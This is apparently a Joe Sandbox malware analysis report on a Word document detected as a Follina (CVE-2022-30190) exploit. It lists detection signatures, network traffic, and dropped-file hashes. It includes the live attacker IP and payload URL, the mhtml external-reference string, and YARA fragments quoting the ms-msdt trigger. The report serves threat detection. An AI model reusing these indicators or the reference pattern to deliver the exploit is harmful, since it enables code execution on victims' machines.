Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
doc782.docx

Overview

General Information

Sample Name:doc782.docx
Analysis ID:640940
MD5:e7015438268464cedad98b1544d643ad
SHA1:03ef0e06d678a07f0413d95f0deb8968190e4f6b
SHA256:d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93
Infos:

Detection

Follina CVE-2022-30190
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Contains an external reference to another file
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1168 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
  • 0x2ca0:$re1: location.href = "ms-msdt:
dump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RESMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
    • 0x1447:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RESJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA120D60.RESMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
      • 0x1447:$re1: location.href = "ms-msdt:
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA120D60.RESJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBF3E02.RESMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
        • 0x1447:$re1: location.href = "ms-msdt:
        Click to see the 1 entries
        No Sigma rule has matched
        Timestamp:185.234.247.119192.168.2.2280491712036726 06/07/22-19:44:37.058628
        SID:2036726
        Source Port:80
        Destination Port:49171
        Protocol:TCP
        Classtype:Attempted User Privilege Gain

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: doc782.docxVirustotal: Detection: 27%Perma Link
        Source: doc782.docxReversingLabs: Detection: 17%

        Exploits

        barindex
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, type: DROPPED
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA120D60.RES, type: DROPPED
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBF3E02.RES, type: DROPPED
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.234.247.119:80
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.234.247.119:80

        Networking

        barindex
        Source: TrafficSnort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 185.234.247.119:80 -> 192.168.2.22:49171
        Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.234.247.119Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.234.247.119If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMTIf-None-Match: "6299dd5d-1861"Connection: Keep-Alive
        Source: Joe Sandbox ViewASN Name: INTERKONEKT-ASPL INTERKONEKT-ASPL
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
        Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.drString found in binary or memory: http://185.2
        Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.drString found in binary or memory: http://185.234.247.119/123.RES
        Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.drString found in binary or memory: http://185.234.247.119/123.RESyX
        Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.drString found in binary or memory: http://185.234.247.119:80/123.RES
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2921E275-B8BF-45B2-888A-BDBD2D0A4929}.tmpJump to behavior
        Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.234.247.119Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.234.247.119If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMTIf-None-Match: "6299dd5d-1861"Connection: Keep-Alive
        Source: dump.pcap, type: PCAPMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA120D60.RES, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBF3E02.RES, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
        Source: doc782.docxVirustotal: Detection: 27%
        Source: doc782.docxReversingLabs: Detection: 17%
        Source: doc782.LNK.0.drLNK file: ..\..\..\..\..\Desktop\doc782.docx
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$doc782.docxJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5743.tmpJump to behavior
        Source: classification engineClassification label: mal68.expl.evad.winDOCX@1/18@0/1
        Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.drOLE document summary: title field not present or empty
        Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.drOLE document summary: author field not present or empty
        Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.drOLE document summary: edited time not present or 0
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: ~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.drInitial sample: OLE indicators vbamacros = False

        Persistence and Installation Behavior

        barindex
        Source: document.xml.relsExtracted files from sample: mhtml:http://185.234.247.119:80/123.res!http://185.234.247.119:80/123.res
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts2
        Exploitation for Client Execution
        Path InterceptionPath Interception1
        Masquerading
        OS Credential Dumping1
        File and Directory Discovery
        Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
        Non-Application Layer Protocol
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
        System Information Discovery
        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
        Application Layer Protocol
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
        Ingress Tool Transfer
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        doc782.docx27%VirustotalBrowse
        doc782.docx17%ReversingLabsDocument-Office.Exploit.CVE-2021-40444
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://185.234.247.119:80/123.RES0%Avira URL Cloudsafe
        http://185.234.247.119/123.RES0%Avira URL Cloudsafe
        http://185.20%Avira URL Cloudsafe
        http://185.234.247.119/123.RESyX0%Avira URL Cloudsafe
        No contacted domains info
        NameMaliciousAntivirus DetectionReputation
        http://185.234.247.119/123.REStrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://185.234.247.119:80/123.RES~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.drfalse
        • Avira URL Cloud: safe
        unknown
        http://185.2~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.drtrue
        • Avira URL Cloud: safe
        low
        http://185.234.247.119/123.RESyX~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp.0.drfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        185.234.247.119
        unknownRussian Federation
        198004INTERKONEKT-ASPLtrue
        Joe Sandbox Version:35.0.0 Citrine
        Analysis ID:640940
        Start date and time: 07/06/202219:43:372022-06-07 19:43:37 +02:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 4m 34s
        Hypervisor based Inspection enabled:false
        Report type:light
        Sample file name:doc782.docx
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:4
        Number of new started drivers analysed:1
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal68.expl.evad.winDOCX@1/18@0/1
        EGA Information:Failed
        HDC Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .docx
        • Adjust boot time
        • Enable AMSI
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        No simulations
        No context
        No context
        No context
        No context
        No context
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.2872757882299728
        Encrypted:false
        SSDEEP:192:y1gV9sJSP4VfWbgIvNmujrzzZxpFcPX/QoZxpFcPX/QN:RRc16Xcf
        MD5:526A6E497879064B79111F0EB079DC69
        SHA1:A0C1A4BA670B7640F1373BE69695CBB8D29602EF
        SHA-256:BE1B8CE88A7FC126829F25E065A41BB623E975860C50196F9DEA860CA5683A48
        SHA-512:E7B903BAAA54CC700553DD777E855EEBC9D32C38A17FC9CDED800C74C63671EFEF1503DAD239CE059AD404FCEBE58FAD3FB5740B6A3078B21A553C1E1C02A2B0
        Malicious:false
        Reputation:low
        Preview:......M.eFy...z.Q..q.vG.Y......S,...X.F...Fa.q................................/kGO....p.?.........5.]?..L......CX.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.6736203037253643
        Encrypted:false
        SSDEEP:96:KTCyVFL4PGgYQIoGGXbMXGFIFiwLi9QtOwHtONXYhO4Y/:AbUPeQxGukLnhao
        MD5:121BD5A641D1017667991A6BED089C9D
        SHA1:C24150EEA5B9FAAF4EA85883F4A2010E848F1258
        SHA-256:8B2A4158CC6A2D08336F295074C4722095EFDE1513079CA76C7DCDDCD0CF40C6
        SHA-512:DF37BF55F2CA4ED734FC35B80BFF71D0D8910874E0D5A45A493310FF5A61A687418FFB87BD0EFE4139B30D9C70FB73B5C73D93E2F83673E1E30FE853763E05A4
        Malicious:false
        Reputation:low
        Preview:......M.eFy...z...0...G._.....S,...X.F...Fa.q.............................|....A.w[............-.g.D.3.......S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):114
        Entropy (8bit):3.9891611412909485
        Encrypted:false
        SSDEEP:3:yVlgsRlzLPlQ3IlFZYDn03cEVS5fIfRP+l1gYlRZ276:yPblzJQ3IlbYD03cxxIfwl1gYDZ22
        MD5:CCB1ED79CC6852066844CFAB96D39ED6
        SHA1:4D72D31AF6234AECC4EE48EFF6E3BEAE916EF0BD
        SHA-256:89EE3B6935806462AD3FD99A239D72CBCED744D8EF1506C3240FA0E916A8555B
        SHA-512:055E3D280BEBA5DD41D25A429DBA3D40FDA5AF560804FC7E5C397BA1D70291746D03D7176D96039151F5C995FF89FF7EA93024648F61AC15968F7F6E0ED31B6C
        Malicious:false
        Reputation:low
        Preview:..H..@....b..q....]F.S.D.-.{.9.0.C.6.0.5.2.8.-.C.9.8.F.-.4.B.C.E.-.9.A.B.0.-.F.5.E.7.9.3.4.0.A.2.7.B.}...F.S.D..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.2885187828602524
        Encrypted:false
        SSDEEP:48:I3HCRBFG2NYJDWfDU/YCSY41oUi+ztEVXIeChj32glRrYOL0MNW9Rc5qpHWumB5w:KHCLFXO1amSBg8NyKINyK7H
        MD5:317DE8F3926F423F05DF5364DB71FEE7
        SHA1:DB169996DE45337D8A0C1A97B0EC5DAEA96D2A4C
        SHA-256:D6F1A882FCD48BF3D86FA004105B84A1BEC310411E6BAA7C444E63414F2308FA
        SHA-512:FCB7FA607792872C0848E5085E12F3C5690EC319EA3DBE1C5FDE6E19C67D0C7867DE70A57B68BDD0EEDD8B3579AF7C62166AEB68E88BC9B6BE374E532F3F9327
        Malicious:false
        Reputation:low
        Preview:......M.eFy...z.o0.B..N.K....6NS,...X.F...Fa.q...............................M)..N.. ...e........qB..w..D.W.90....A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.22152754214705603
        Encrypted:false
        SSDEEP:24:I3Ca2rcLwnM0B34x6xPXFQfE+a3AmFHD0TXJFFmZ7fhmABvDzCARnZzqZzV6Egjt:I3Ca2AUrB1FJfT3Hja/C6SzsnIsnw
        MD5:9D421CB4E95C534AFA4DF087D46B16C6
        SHA1:A552DBB3209497D1246753410028BC8AA300BE05
        SHA-256:DD78DDB4B96B4CEAFDCB4FC5720419CAB5F873AC58E3CC4350F94C9B6B2E348E
        SHA-512:C3FF9888E2D64382B2FE5AB75DBD545B28B8CA0082ABF4FC0DC7480276544BBA3E21FF64625E9167FA844BA25024359205A87829A156D119C6D53D09F02F24FA
        Malicious:false
        Reputation:low
